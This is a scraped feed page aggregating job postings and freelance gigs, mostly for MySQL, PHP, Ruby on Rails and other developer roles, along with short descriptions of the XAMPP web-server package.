          Looking for someone proficient in QB Customization, QB API's and Script Developement      Cache   Translate Page   Web Page Cache   
Looking for a backend developer to help me with various projects. Needs to be an expert in Quickbooks customization & QB API's Needs to be familiar with fulfillment software (3PL Central, covalentworks,... (Budget: $30 - $250 USD, Jobs: Accounting, ASP, MySQL, PHP, Software Architecture)
          XAMPP Portable      Cache   Translate Page   Web Page Cache   
With "XAMPP Portable" you set up a web server. The package contains various components such as Apache, MySQL, PHP, Perl, OpenSSL, phpMyAdmin, Webalizer, NetWare, the FileZilla FTP server, the Mercury Mail Transport System and SQLite. Once everything is installed, a complete development and test environment with databases and programming languages is available. Handy: this portable version of "XAMPP" can be run without installation on any PC or notebook, for example directly from a USB stick.
          XAMPP (Mac)      Cache   Translate Page   Web Page Cache   
With "XAMPP" you set up a web server. The package contains various components such as Apache, MySQL, PHP, Perl, OpenSSL, phpMyAdmin, Webalizer, NetWare, the FileZilla FTP server, the Mercury Mail Transport System and SQLite. Once everything is installed, a complete development and test environment with databases and programming languages is at your disposal.
          XAMPP      Cache   Translate Page   Web Page Cache   
With "XAMPP" you set up a web server. The package contains various components such as Apache, MySQL, PHP, Perl, OpenSSL, phpMyAdmin, Webalizer, NetWare, the FileZilla FTP server, the Mercury Mail Transport System and SQLite. Once everything is installed, a complete development and test environment with databases and programming languages is available.
          today's howtos      Cache   Translate Page   Web Page Cache   

read more


          Facebook message system      Cache   Translate Page   Web Page Cache   
We want a connection with Facebook pages messages. 1. Login with facebook login 2. select facebook page for the messages 3. Read the messages from the page (with a script) 4. Answer the messages I want... (Budget: €250 - €750 EUR, Jobs: AJAX, HTML, Javascript, MySQL, PHP)
          Migration C# code to Spring      Cache   Translate Page   Web Page Cache   
I have a C# project - socket programming. I would like this project to get migrated to Spring 5 with proper documentation. This is the project which I would like to migrate. https://github.com/cyberinferno/LoginAgent (Budget: ₹1000 - ₹1500 INR, Jobs: C# Programming, Java, MySQL)
          Need exp CI Developer urgently      Cache   Translate Page   Web Page Cache   
Need exp CI Developer urgently (Budget: ₹100 - ₹400 INR, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Software Developer (PHP) at Supermart Express Service      Cache   Translate Page   Web Page Cache   
Supermart.ng, Nigeria's leading online supermarket. If you desire to work in a fast paced environment, and experience rapid personal and career growth while making a tremendous impact in society, then this might be the company for you. We offer a truly entrepreneurial experience in a fast paced, yet structured environment, work within a proudly Nigerian company built by young, talented and dynamic entrepreneurs. We operate a structured yet fun and easy-going work environment and also a management trainee and in-house entrepreneurial mentor-ship program.Job Description Design, build, and maintain efficient, reusable, and reliable PHP code Integration of data storage solutions (MySQL, MongoDB) Building Restful APIs. Identify bottlenecks and bugs, and devise solutions to these problems Help maintain code quality, organization and automatization Writing automated test using codeception. Solving complex performance problems and architectural challenges. Qualifications Degree and/or relevant certifications One to two years experience with PHP, Laravel Framework.
          Patient database Management System      Cache   Translate Page   Web Page Cache   
We have already have patient database management system, where are some bugs , we want to resolve them as you will show interest in our project i will clear the all the project information. (Budget: $30 - $250 USD, Jobs: .NET, ASP, Database Programming, MySQL)
          Word Press Developer Free Lancer Needed       Cache   Translate Page   Web Page Cache   
Wordpress Plugins Developer wanted, has developed a few plugins before. PHP and MySQL is a must. Code with wordpress coding standard. Project for SME web site. Thanks. (Budget: $10 - $30 USD, Jobs: MySQL, PHP, WordPress)
          Freelancer.com: Change RESTful example from session/Criteria to using EntityManager and NamedQuery      Cache   Translate Page   Web Page Cache   
Hi, this is for educational purpose, Referring to the following RESTful webservcie example project: https://github.com/mustafamym/Spring-Boot-REST-JPA-Hibernate-MySQL-Example Currently the project is using Session and Criteria to manage sql queries... (Budget: $10 - $20 AUD, Jobs: J2EE, Java, Linux, MySQL, node.js)
          [Tutorial] Download Packt SQL Server 2017 Express Basics – Introductory SQL Server 2017 Express Training      Cache   Translate Page   Web Page Cache   

Download Packt SQL Server 2017 Express Basics - an introductory SQL Server 2017 Express course

Microsoft SQL Server is a relational database management system developed by Microsoft. Its features include creating and managing relational databases, ACID support, referential integrity support, database migration capabilities, and many other data-related features. The software comes in various editions suited to different working environments. One of its capabilities is compatibility with different platforms, especially Microsoft Azure. Using this feature, fast access to existing data becomes possible and IT administrators can take advantage of the Microsoft Azure cloud ...


http://p30download.com/80800




Download link: http://p30download.com/fa/entry/80800


          Senior Python/Django Full Stack Developer      Cache   Translate Page   Web Page Cache   

England, United Kingdom (required on-site)

About WiseAlpha

WiseAlpha is a Fintech that is shaking up the banking and fixed income industry. Until now, the corporate loan and bond market has remained largely untransformed by technological innovation and access has remained out of the hands of everyday investors. WiseAlpha is leading the way in opening this multi-trillion asset class to the masses. Our philosophy is one of market liberalisation and freedom of access to the best investments. We are looking for similarly minded people to join the firm as we expand. And, not that we like to brag, but we also won the award for Best Investments Provider at the British Bank Awards 2018.


About you

We’re looking for a top-class Python/Django developer to help us build and improve our platform. We’re a small team so we need lateral thinkers and keen all-rounders who are happy to work on all parts of the system. Our team takes pride in quality work and delivering on tight schedules whilst striving to produce scalable and maintainable code.


What will I be doing?

You’ll be working closely with the CTO and a small team, building new products and services as well as streamlining the existing system. Your voice matters! As we’re such a small team you’ll be able to help shape all parts of the development processes. Our goal is to keep lean and agile whilst producing high-quality software.


Skills and experience

We’d like you to have had exposure to a wide range of web technologies. Ideally, you’ll have worked with the following:

  • Django

  • Python

  • Django Rest Framework

  • React, Angular or Backbone

  • Jquery

  • Javascript

  • AWS

  • Postgress/MySQL

  • HTML5

  • CSS 3

  • Responsive design

  • Git


Nice to have:

  • Test-driven development

  • Typescript

  • Redis

  • Celery


Extra creds for:

  • Having a numerate based degree (Computer Science/Maths/Physics)

  • Having worked in a financial institution

  • Having built or managed an iOS/Android app rollout

  • Having managed a coding team

  • Experience with Continuous Integration/Continuous Delivery

  • Good at humaning



          (USA-WA-Seattle) Senior SQL Developer      Cache   Translate Page   Web Page Cache   
Senior SQL Developer Senior SQL Developer - Skills Required - SQL Server, T-SQL, SSIS SSRS & SSAS, SQL Development, Data Warehouse design & development, Designing and developing database in MS SQL Server, Stored Procedures, Development knowledge in SQL Server 2008-2016, Powershell Scripting, MY SQL If you are a Senior SQL Developer with experience, please read on! Based in beautiful Seattle we are a luxurious and innovative company that specializes in tourism. Due to growth and demand for our services, we are in need of hiring for a Senior SQL Developer that possesses strong experience in database development, TSQL, and MS SQL or a comparable technology. We specialize in luxury leisure travel with almost 20,000 advisers and 1700 partnerships with top hotels, cruise lines, tour operators, and more. If you are interested in joining a superior travel company that pushes the envelope in tourism and definitely cares about providing a great working environment for its employees, then apply immediately. **What You Will Be Doing** This role actively participates as a Senior SQL Developer contributing to SQL Development and has experience in SQL Server 2008 and above. You will work on data warehouse design and development entity relationship model design, good data typing practices, index management, data management, and data security. Expert level knowledge of TSQL, performance tuning, Query Plans, and Query Plan optimization for TSQL. Be able to understand the development of BI/DW architectures. **What You Need for this Position** Advanced experience in developing database in MS SQL Server utilizing stored procedures, functions, triggers, queries etc or alternately 5+ years with an equivalent product such as DB2, Oracle, or MySQL Must possess knowledge of how to tune and optimize SQL Server database and solutions including partitioning, indexing, de-normalization etc. Need to have working knowledge of Query Execution Plan and Execution Statistics Expert in creating tables, indexes, keys, constraints and triggers to facilitate efficient data manipulation, integration and consistency. Excellent understanding of Entity-Relationship/Multidimensional Data Modeling (Star schema, Snowflake schema), Data Warehouse Life Cycle and SQL Server Analysis Services (SSAS). Knowledge of newer database architectures, tools and best practices for SQL Server including ORM mapping tools, including but not limited to NoSQL, BigData, Analytics etc. **What's In It for You** -Medical -PTO -Vision -401k -Dental -Life -110-130k DOE So, if you are a Senior SQL Developer with experience, please apply today! --- You can also email me directly at lindsey.palma@cybercoders.com --- Find me on LinkedIn - www.linkedin.com/in/lindseypalma Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Senior SQL Developer* *WA-Seattle* *LP5-1466910*
          (USA-CA-San Francisco) Principal Product Manager      Cache   Translate Page   Web Page Cache   
Principal Product Manager (Payfac) Principal Product Manager (Payfac) - Skills Required - PayFac, Mobile Products, Web Products, Product Management, Product Development, Product Design, Product Research & Strategy, Agile, Python, MySQL If you are a Principal Product Manager (Payfac) with experience, please read on! **What You Will Be Doing** Lead the roadmapping, prioritization, development, and execution of major payment initiatives. Act as a GM for payment products Own company-level OKRs for that initiative. Work cross-functionally with Engineering, Design, Analytics, Marketing, and other product teams to create experiences users love. Use qualitative customer research and data analysis to communicate product vision to senior management and various stakeholders. **What You Need for this Position** Degree in computer science, engineering or related field 8+ years of experience building, launching and iterating on product initiatives that users love Previous experience building payment products (Payfac specifically) Strong technical architectural understanding of mobile and web products Proven ability to lead teams and work cross-functionally in a highly collaborative environment Excellent data analysis skills Excellent written and verbal communication skills with the ability to champion products across the organization Knowledge of product management best-practices around development (e.g., agile), roadmapping/vision (e.g., user-research, & strategic thinking), and coordination/communication with key internal stakeholders (e.g., design & marketing) **What's In It for You** HIGHLY competitive comp package and an amazing team! So, if you are a Principal Product Manager (Payfac) with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Principal Product Manager* *CA-San Francisco* *EU1-1467001*
          (USA-NY-New York City) Mid Level Ruby on Rails Developer
Mid Level Ruby on Rails Developer Mid Level Ruby on Rails Developer - Skills Required - Ruby On Rails, Client side framework like Backbone or Angular, MVC, RESTful JSON API's and microservice methodologies, MySQL, Mongodb and Redis datastore/caching layers, Testing frameworks on both sides of the stack If you are a Full Stack Developer with experience, please read on! Our company harnesses the power of celebrity, technology, and media to raise awareness and funds for some of the world's toughest challenges. With a mission to complement traditional fundraising models and help charities transition from analog to digital, we have raised well over $200M for charity since inception...and were just getting started. **What You Will Be Doing** As a fullstack developer, your primary responsibilities will be maintaining and adding features to the current rails production apps, and developing the apps of the future. You will work closely with a stellar team of engineers, designers, and product people in a casual office atmosphere **What You Need for this Position** Requirements and Qualifications: BS/MS degree equivalent or 3+ years of programming experience in production Experience working with various Rails/Ruby versioning (3.2+ and Ruby 1.9 +) Equally comfortable in a client side framework like Backbone or Angular MVC, writing writing clean, loosely coupled code. Loves RESTful JSON APIs and microservice methodologies Experience working with MySQL, Mongodb and Redis datastore/caching layers. Experience with testing frameworks on both sides of the stack Bonus Skills: Experience with Java and Play framework Experience handling Rackspace, AWS and Heroku infrastructure **What's In It for You** Competitive salaries Potential Equity Paid time off Medical, dental, & vision insurance Life Insurance and Disability Benefits 401K Top of line Macbooks So, if you are a Full Stack Developer - Java w/play framework with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Mid Level Ruby on Rails Developer* *NY-New York City* *DA3-1466844*
          (USA-MA-Boston) Magento Developer -
Magento Developer - (Magento/PHP7) Magento Developer - (Magento/PHP7) - Skills Required - Magento, PHP7, MySQL, Laravel If you are a Magento Developer looking for a new job opportunity, read on! We are an ecommerce company based in Somerville, and we have one of the sharpest teams around! Currently we are looking for a Software Engineer who has worked with the most recent versions of Magento and PHP, while also working with Laravel and MySQL. Apply now! **What You Need for this Position** At Least 3 Years of experience and knowledge of: - Magento - PHP7 - MySQL - Laravel So, if you are a Magento Developer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Magento Developer -* *MA-Boston* *MM5-1466750*
          (USA-IL-Naperville) Software Engineer -React.JS, RoR, MySQL-
Software Engineer -React.JS, RoR, MySQL- (125K - 140K) Software Engineer -React.JS, RoR, MySQL- (125K - 140K) - Skills Required - Ruby On Rails, MySQL, SQL, Github, Bit Bucket, Familiar with AWS, React.JS, Angular.js, Amber.JS Job title: Full-Stack Software Engineer Job Location: Naperville, IL Required Skills: Ruby On Rails, React.JS (Preferred), MySQL, SQL, Angular.JS, or Amber.JS Salary: 125K - 140K Located in beautiful Libertyville, IL, we are the leading Sr. level performance capital level management company in the state of Illinois. We encourage and emphasize collaboration and innovation in all of our employees. We boast flexibility to the smartest, brightest, and driven individual. Due to growth and ongoing and future projects, we are looking to hire for a talented Full-Stack Software Engineer to join our team. This person should strong experience with Ruby On Rails, SQL, MySQL, and (React.JS (Preferred), Angular.JS, or Amber.JS). We would like to see this candidate also have Github, Bit bucket, and be familiar with AWS. If this sounds like you, please apply for this amazing opportunity! **What You Need for this Position** Required Skills: - Ruby On Rails - React.JS (Preferred), Angular.JS, or Amber.JS - MySQL - SQL Nice to have skills: - Github - Bit Bucket - Familiar with AWS **What You Will Be Doing** - Be responsible for information on the detailed technical design and development of applications using emerging and existing technology platforms. - Codes and design application programs - Performs testing for developed applications - Conducts analyses of client needs and goals for the implementation and development of application systems. - Analyzes, review, and modifies programming systems, including testing, coding, debugging, and installing for a large-scale system. - Ensures the functioning efficiency of current application systems **What's In It for You** We are a fantastic company that believes in taking care of its employees. If hired, you will be rewarded with an offer that will include: - Solid competitive pay (125K - 140K) - Bonus incentives - Amazing work life balance - Medical, dental, vision, Rx, 401k, FSAs, life insurance, disability insurance - Fun, laid-back environment, casual dress code - 401K - PTO - Incredible job stability - A great and fun working environment - & other cool perks! **Top Reasons to Work with Us** - Excellent Work/Life Balance. - Join a Hyper-growth company with the opportunity to shape the strategic direction of the company. - We work with cutting-edge technologies that keep our employees intellectually stimulated and professionally marketable. - We operate in a Class A office environment and pride ourselves on cultivating a hospitable work space for everyone to prosper. - In-addition to retaining employees by means of a hospitable, intellectually stimulating workplace we believe in compensating our people with aggressive compensation packages. - We help our customers make the best smart devices in the world by automating and digitizing testing. - We get things done and for us there is no such thing as mission impossible. - Our clients are the world's biggest tech companies. So, if you are a Software Engineer - RoR, React.JS, SQL, MySQL - (125K - 140K) with experience, please apply today! Applicants must be authorized to work in the U.S. 
**CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Software Engineer -React.JS, RoR, MySQL-* *IL-Naperville* *ND2-1466878*
          (USA-CA-San Francisco) Infrastructure Engineer -
Infrastructure Engineer - Infrastructure Engineer - - Skills Required - LAN/WAN, BGP, Data Center, Juniper, ITIL, OSPF, Citrix, MySQL, VPN If you are a Infrastructure Engineer with experience, please read on! **Top Reasons to Work with Us** Exciting Startup **What You Will Be Doing** Sr. Systems / Infrastructure Engineer to join the super computing group. The high performance computing group is responsible for engineering and maintaining large scale environments specifically for solving large scale data science and artificial intelligence problems. Architect, install, configure and administer server systems (Ubuntu, Centos RHEL, Windows Server, Citrix) Designing hardware requirements and selecting and procuring appropriate hardware Architect, install, configure and administer storage area networks (SAN) Architect network architecture and install, configure and administer common networking components such as firewalls, switches, routers, VPN, KVM and security appliances Develop and administer security architecture, two-factor authentication, SAML, auditing and intrusion detection systems Troubleshoot server, storage and networking problems **What You Need for this Position** 4+ years of real world industry experience Experience in maintaining Ubuntu, Centos, Redhat and Windows Servers Knowledge of designing and implementing data center and server architectures and operations (Dell and HP) Design and Maintain complex LAN / WAN (BGP, ISIS, OSPF, MPLS) Deep knowledge of vendor networking products (Cisco, Dell, Brocade, Juniper, SonicWall) Deep knowledge of designing and implementing virtual infrastructures (HyperV, VMware) Experience with deploying VDI (Citrix XenApp, XenDesktop, NetScaler) Knowledge of administering common RDBMS (MSSQL, MySQL, Etc.) Experience in ITIL CMDB practices Knowledge of load balancing (Juniper, Peplink) Deep knowledge of enterprise storage area networks (SAN), network attached storage (NAS), data center storage, failover, backup, disaster recovery Deep knowledge of AWS integration with on premise infrastructure / systems Knowledge of infrastructure automation through scripting (powershell, python, shell) Proven project management skills Proven team leadership skills Strong problem solving and troubleshooting skills **What's In It for You** Great Salary and Benefits So, if you are a Infrastructure Engineer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Infrastructure Engineer -* *CA-San Francisco* *RC4-1467004*
          (USA-CA-San Francisco) Data Engineer Spark -
Data Engineer Spark - Data Engineer Spark - - Skills Required - Hadoop, SPARK, Linux, Engineer If you are a Data Engineer Spark with experience, please read on! **Top Reasons to Work with Us** Highly reputable **What You Will Be Doing** Develop custom ETL applications using Spark in Python/Java that follow a standard architecture. Success will be defined by the ability to meet requirements/acceptance criteria, delivery on-time, number of defects, and clear documentation. Perform functional testing, end-to-end testing, performance testing, and UAT of these applications and code written by other members of the team. Proper documentation of the test cases used during QA will be important for success. Other important responsibilities include clear communication with team members as well as timely and thorough code reviews. As you grow in the role, you will have the opportunity to contribute to designing of new applications, setting/changing standards and architecture, and deciding on usage of new technologies. **What You Need for this Position** Linux - common working knowledge, including navigating through the file system and simple bash scripting Hadoop - common working knowledge, including basic idea behind HDFS and map reduce, and hadoop fs commands. Spark - how to work with RDDs and Data Frames (with emphasis on data frames) to query and perform data manipulation. Python/Java - Python would be ideal but a solid knowledge of Java is also acceptable. SQL Source Control Management Tool - We use BitBucket Experience ---------- Worked/developed in a Linux or Unix environment. Worked in AWS (particularly EMR). Has real hands-on experience developing applications or scripts for a Hadoop environment (Cloudera, Hortonworks, MapR, Apache Hadoop). By that, we mean someone who has written significant code for at least one of these Hadoop distributions. Has experience with ANSI SQL relational database (Oracle, SQL, Postgres, MySQL) **What's In It for You** Great Salary and Benefits So, if you are a Data Engineer Spark with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Data Engineer Spark -* *CA-San Francisco* *RC4-1466982*
          (USA-AZ-Scottsdale) Senior Database Administrator
Senior Database Administrator Senior Database Administrator - Skills Required - MSSQL, Couch, MySQL, PostgreSQL, Database sharing and partitioning, Linux, Database backup / restore and recovery models, PHP/Python/Ruby/Java/C/C++/C#/Javascript, AWS DynamoDB / Redshift / Redis, Managing databases in virtual / cloud environments If you are a Senior Database Administrator with experience, please read on! The Senior Database Administrator designs, implements, manages and supports our production and development databases. You will ensure our production databases have minimal downtime and are tuned for optimal performance and response time. You will also be responsible for performing security and maintenance releases. Further, you will work closely with a team of developers to define and evolve our data model, support application development, and data analytics. **What You Will Be Doing** Manage primary and replica databases across multiple data centers Document policies, procedures, and technical standards related to disaster recovery planning and execution Work with engineering and operations teams to define multi-data center replication strategy Essential Database Administration - install, configure, upgrade, back up, and monitor databases Serve as point-of-contact for any defined database questions regarding performance, security, or ongoing maintenance Automate and script DBA tasks Work with application developers and systems engineers to troubleshoot and optimize queries, and performance bottlenecks for current and future implementations Engagement with Linux administration/operations and virtualization engineers Integrate instances with enterprise monitoring and alerting tools Outages and alert response to ensure availability of database and infrastructure Refine processes to improve high performance and high availability Create instrumentation/monitoring solutions to gain insight into existing application and database performance and to understand emerging issues Maintain and create automation and deployment software and tools. **What You Need for this Position** Experience troubleshooting PostgreSQL query performance 4-8 years of experience in MySQL database management and scripting in a professional environment. Recent experience implementing multilayer, high-availability replication topologies Exposure to NoSQL platforms and conceptual understanding 3+ years of experience in one or more of: PHP, Python, Ruby, Java, C, C++, C#, JavaScript Understand virtualization and creating performant virtualized environments Ability to manage multiple projects with competing priorities in a fast-paced environment Experience with Database sharing and partitioning Experience with Linux Experience with database backup, restore and recovery models 5+ years as MySQL production DBA including experience with design, implementation, backup and recovery, monitoring, and performance tuning. Experience with 24x7 support and troubleshooting production related database issues. 2+ years of experience managing databases in virtual and cloud environments (AWS Redshift, VMware, RDS, EC2) Experience with designing and implementing high-availability database features, utilizing various replication and disaster recovery methodologies. Experience implementing database schema changes in live production environment requiring minimal downtime and zero performance impact. 
Experience defining and implementing database management tools across entire database platform to ensure database performance and stability is maximized across the entire organization Experience with managing the full life-cycle of database schema design and implementation, which includes script management from development through production releases. Experience with establishing and implementing database security and backup retention policies. Experience with scaling up and out (e.g. sharding based on specific keys) databases to meet the needs of increased storage and computing capacity. Experience managing non-relational database servers such as AWS DynamoDB, Redshift, Redis or other No-SQL platforms. So, if you are a Senior Database Administrator with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Senior Database Administrator* *AZ-Scottsdale* *SM9-1466817*
          (USA-VA-Arlington) Sr. Front End Engineer- JavaScript Guru Needed!
Sr. Front End Engineer- JavaScript Guru (Angular/React ) Needed! Sr. Front End Engineer- JavaScript Guru (Angular/React ) Needed! - Skills Required - Front End Development, JavaScript(ES6), Angular 2/4, ReactJS, CSS3/HTML5, RESTful APIs & Web Services, SQL programming (PostgreSQL/MySQL), Git / Github, Automation Tools (Webpack/Grunt/Gulp/NPM), TypeScript If you are a mid - senior level Software Engineer with extensive Front End focused development experience utilizing JavaScript (ES6 ), Angular.js (or React.js), CSS3, HTML5, please read on! Based in Arlington, VA, our SaaS products is one of the leading business operating systems helping independent contractors to small-business owners. We are now looking for a mid - senior level Software Engineer to apply their expertise in browser-based app development. The ideal candidate should have the ability to write clean JavaScript (Angula JS) based code, even when faced with a challenge. If this sound like you, then how does joining a growing multi-disciplinary team to develop new capabilities and workflows to solve real-world problems sound? **Top Reasons to Work with Us** 1. Industry Leading Product 2. Massive Growth 3. Great Work, Life Balance **What You Will Be Doing** - You will contribute in developing responsive single-page applications and tools for our products that support thousands of users, nationwide and globally. - Mentor junior developers, perform code reviews, ensuring adherence to design standards and secure coding practices. - Develop/Design, implement and test high quality web applications in a cloud-based environment. - Help brainstorm and plan new applications and web services. -You will take ownership of technical problems and their resolution, including pro-actively communicating with product managers, designers, and the operations team. **What You Need for this Position** Required: - 5+ years of Software or Web Application Development experience with a Front End (UI) focus - Advanced JavaScript experience - Proficient with AngularJS (any version - preferred) or ReactJS experience - Proficient with modern web technologies such as CSS3, HTML5, Bootstrap, and/or jQuery - Experience or strong knowledge of RESTful APIs and Web Services - Source Control Management experience with Git - Agile Development experience Nice to have skills, but NOT REQUIRED: - Experience with CSS preprocessors - SASS or Less - Experience with ES6 or TypeScript - Experience with Reactive programming (RxJS and Redux ) - Server Side code with Python (Django, Flask), Rails, and/or Node.js (Express.js) - Experience with Amazon Web Services (AWS) - Experience or knowledge of Web Security **What's In It for You** - A Competitive Base Salary $120-$140k, D. O. E. - Great Medical/Dental/Vision Benefits - 401k with Matching - 18 days PTO, 7 Paid Holidays, 5 Paid Sick Days - WORK FROM HOME FRIDAYS /Office Monday - Thursdays only - Fun, Casual work environment - Company events and social gatherings So, if you are a Senior Software Engineer with 5+ years of Front End Development experience with JavaScript and JS MVC frameworks, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. 
**Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Sr. Front End Engineer- JavaScript Guru Needed!* *VA-Arlington* *LS3-1466777*
          (USA-MN-Eden Prairie) Principal Software Engineer - Full Stack Developer
Principal Software Engineer - Full Stack Developer Principal Software Engineer - Full Stack Developer - Skills Required - Full Stack Software Engineer, .Net and C#, REACT, DynamoDB, NoSQL Databases, AWS, Working on an Agile development team, XML, JSON, MySQL If you are a Principal Software Engineer - Full Stack Developer with 6-8+ years of experience, please read on! With offices in six different states and also in Australia and Dubai, we are the global leader in healthcare communications. We have a casual & collaborative work atmosphere where everyones opinions & ideas are valued. Don't wait, apply today! Interviews are going on now. --- Your application will be considered incomplete unless the screening questions are answered. Incomplete applications cannot be submitted for further review. Please answer all of the screening questions in detail in order to expedite the process. --- -- Please note that only qualified candidates will be contacted -- **What's In It for You** - Competitive salary (Depending on experience) - Full benefits - 70% paid - 3 weeks PTO - Retirement plan with company matching - Jeans & t-shirts are our daily uniform - Work for a well-established growing company - Plus a lot more... **What You Will Be Doing** This role will develop, enhance & sustain innovative solutions to improve the customer experience. The Principal Software Engineer will implement complex software in accordance with project requirements, UX design & industry best practices. The Principal Software Engineer will also review designs & participate in meaningful collaboration sessions on how to solve customer problems & participate in determining scope for new projects. The Principal Software Engineer will own components of the architecture and direct the work of other team members; scaling projects efficiently while maximizing performance & minimizing costs & ensuring quality. Duties & Responsibilities: - Lead Scrum team to develop our new native software that will be a key component of our product offering. - Provide technical guidance in software design & development activities. - May oversee development team & coordinate strategies amongst teams to ensure technologies are interconnected & product lines are working smoothly Code, test, debug, document & maintain software applications using established coding standards & methodologies. - Participate in Scrum activities, perform code reviews, contribute to a high performing, growing team. - Own component(s) of the architecture and direct the work of other team members. - Ensure new software meets quality standards through writing unit and automated tests. - Troubleshoot, debug, and resolve product issues as they arise. - Assist in designing interfaces to improve the user experience. - Support the application lifecycle (concept, design, test, release & support). - Follow established development, documentation, testing and deployment processes. - Gather requirements and suggest solutions; serve as an integrator between business needs and technology solutions. - Collaborate with product development team to plan new features. - Participate in planning and scoping meetings for future projects. - Work cross functionally to resolve complex customer problems. - Responsible for managing & maintaining project & work backlog - Able to re-prioritize tasks as the business deems appropriate. - Lead other engineers in planning, prioritizing & executing assigned tasks within deadlines - Identify, track & mitigate risks as appropriate. 
- Stay current with new technology trends. - Train, coach and mentor other engineers. - Other duties may be assigned. **What You Need for this Position** Required Qualifications: - Bachelor's degree from four-year college or university & 8 years experience, or Masters Degree in Computer Science and 6 years experience with a minimum of 3 years experience leading teams; or equivalent combination of education & experience. Desired Skills: - Strong experience as a Full Stack Software Engineer - Strong Experience with .NET and C# - Strong with React - Strong experience with DynamoDB or other NoSQL databases - Experience with AWS - Experience with XML and JSON - Experience with MySQL - Understanding Java is a plus - Understanding of HL7 protocol is a plus - Understanding of Docker is a plus - Experience working on an Agile development team - Experience working in a Healthcare/clinical environment - Ability to identify, own, and solve problems independently or as part of a team. So, if you are a Principal Software Engineer - Full Stack Developer with 6-8+ years of experience, please apply today! -- Please note that only qualified candidates will be contacted -- Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Principal Software Engineer - Full Stack Developer* *MN-Eden Prairie* *SN2-1466741*
          PHP and Codeigntor Changes
We have an existing site where email has stopped working. Need someone with experience to quickly fix it. (Budget: ₹12500 - ₹37500 INR, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Data Driven Safety, LLC: Software Developer Enamored of Text and Data

("Huntersville, NC", "Anywhere")

Needed yesterday: A competent (read: excellent) developer who truly enjoys solving complex scripting challenges with efficiency and precision. We're looking for people who love to tinker with computers (hardware and software), who work with text terminals all the time (and prefer it!), and who work well with limited management (i.e., take initiative). People who like to track down problems hidden in haystacks and solve them with solutions that prevent that category of problems in the future.  Does this describe you?

Skills & Requirements

  • enough experience to dive in quickly and be up-to-speed quickly
  • ability to work on multiple tasks simultaneously
  • strong coding skills, of course (essential familiarity:  ruby, bash; very helpful:  mechanize, xpath, text processing; extras: perl, lua, mysql)
  • self-motivated and objective-based (we don't care about face time)
  • Debian or Ubuntu experience is very helpful; working in Linux essential

Additional Details

Work remotely from anywhere (many employees do so full-time, others on occasion), in-person routinely in Los Angeles, or on-site in Huntersville, North Carolina.

Looking for mid-level, but will consider junior and senior level as well, as long as you have been coding as a hobby for a long time (in the case of the former), and aren't stuck in your ways (in the case of the latter).

Challenging, but supportive environment with a fun team that knows how to balance life and work.

Full-time. Competitive compensation. Planning to hire immediately.

 

No recruiters please.

About Data Driven Safety

How DDS is described by our employees: "No bs, no corporate politics, no dress code, financially-secure company, flexible work schedules, objective-based approach, employees all over the world, telecommuting is as normal as on-site, love what I do (at least most days), ... what did you want me to say again?"

DDS is a small company with a close-knit employee group. We have maintained a nearly 100% client and employee retention rate. We offer competitive salary and benefit packages to smart, loyal, creative thinkers that excel at problem solving.

